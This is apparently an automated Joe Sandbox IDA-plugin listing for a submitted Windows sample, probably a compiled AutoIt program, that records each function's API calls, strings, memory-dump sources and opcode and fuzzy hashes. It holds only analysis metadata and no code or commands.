                                          • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                          • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                          APIs
                                          • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                          • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                          • VariantClear.OLEAUT32 ref: 0045EA6D
                                          • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                          • __swprintf.LIBCMT ref: 0045EC33
                                          • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                          Strings
                                          • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                          • String ID: %4d%02d%02d%02d%02d%02d
                                          • API String ID: 2441338619-1568723262
                                          • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                          • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                          • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                          • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                          APIs
                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                          • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Interlocked$DecrementIncrement$Sleep
                                          • String ID: @COM_EVENTOBJ
                                          • API String ID: 327565842-2228938565
                                          • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                          • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                          • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                          • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                          APIs
                                          • VariantClear.OLEAUT32(?), ref: 0047031B
                                          • VariantClear.OLEAUT32(?), ref: 0047044F
                                          • VariantInit.OLEAUT32(?), ref: 004704A3
                                          • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                          • VariantClear.OLEAUT32(?), ref: 00470516
                                            • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                          • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                            • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                          • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Variant$Clear$Copy$CallDispFuncInit
                                          • String ID: H
                                          • API String ID: 3613100350-2852464175
                                          • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                          • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                          • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                          • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                          APIs
                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                          • DestroyWindow.USER32(?), ref: 00426F50
                                          • UnregisterHotKey.USER32(?), ref: 00426F77
                                          • FreeLibrary.KERNEL32(?), ref: 0042701F
                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                          • String ID: close all
                                          • API String ID: 4174999648-3243417748
                                          • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                          • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                          • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                          • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                          • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                          • String ID:
                                          • API String ID: 1291720006-3916222277
                                          • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                          • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                          • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                          • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                          APIs
                                          • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                          • IsMenu.USER32(?), ref: 0045FC5F
                                          • CreatePopupMenu.USER32 ref: 0045FC97
                                          • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                          • String ID: 0$2
                                          • API String ID: 93392585-3793063076
                                          • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                          • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                          • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                          • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                          APIs
                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                          • VariantClear.OLEAUT32(?), ref: 00435320
                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                          • VariantClear.OLEAUT32(?), ref: 004353B3
                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                          • String ID: crts
                                          • API String ID: 586820018-3724388283
                                          • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                          • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                          • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                          • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                          APIs
                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                          • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                          • _wcscat.LIBCMT ref: 0044BCAF
                                          • _wcslen.LIBCMT ref: 0044BCBB
                                          • _wcslen.LIBCMT ref: 0044BCD1
                                          • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                          • String ID: \*.*
                                          • API String ID: 2326526234-1173974218
                                          • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                          • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                          • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                          • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                          APIs
                                            • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                          • _wcslen.LIBCMT ref: 004335F2
                                          • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                          • GetLastError.KERNEL32 ref: 0043362B
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                          • _wcsrchr.LIBCMT ref: 00433666
                                            • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                          • String ID: \
                                          • API String ID: 321622961-2967466578
                                          • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                          • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                          • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                          • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                          • API String ID: 1038674560-2734436370
                                          • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                          • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                          • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                          • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                          • LoadStringW.USER32(00000000), ref: 00434060
                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                          • LoadStringW.USER32(00000000), ref: 00434078
                                          • _wprintf.LIBCMT ref: 004340A1
                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                          Strings
                                          • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString$Message_wprintf
                                          • String ID: %s (%d) : ==> %s: %s %s
                                          • API String ID: 3648134473-3128320259
                                          • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                          • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                          • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                          • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                          • __lock.LIBCMT ref: 00417981
                                            • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                            • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                            • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                          • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                          • __lock.LIBCMT ref: 004179A2
                                          • ___addlocaleref.LIBCMT ref: 004179C0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                          • String ID: KERNEL32.DLL$pI
                                          • API String ID: 637971194-197072765
                                          • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                          • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                          • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                          • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _memmove$_malloc
                                          • String ID:
                                          • API String ID: 1938898002-0
                                          • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                          • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                          • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                          • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                          APIs
                                            • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                          • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                          • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                            • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                          • String ID:
                                          • API String ID: 3771399671-0
                                          • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                          • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                          • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                          • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                          • _memmove.LIBCMT ref: 0044B555
                                          • _memmove.LIBCMT ref: 0044B578
